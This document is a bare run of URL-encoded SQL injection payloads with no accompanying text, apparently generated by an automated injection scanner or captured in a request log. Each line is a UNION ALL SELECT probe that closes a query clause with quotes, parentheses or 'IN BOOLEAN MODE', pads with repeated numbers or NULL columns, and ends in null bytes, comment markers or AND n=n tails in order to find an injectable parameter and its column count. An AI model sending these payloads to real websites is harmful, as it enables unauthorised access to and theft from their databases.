-8128%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%00%20%23 -2014%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%00%20%23 -9836%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%00%20%23 -4805%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%00%20%23 -9304%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%2C%201708%00%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%283795%3D3795 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281958%3D1958 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%288750%3D8750 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%286864%3D6864 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%285369%3D5369 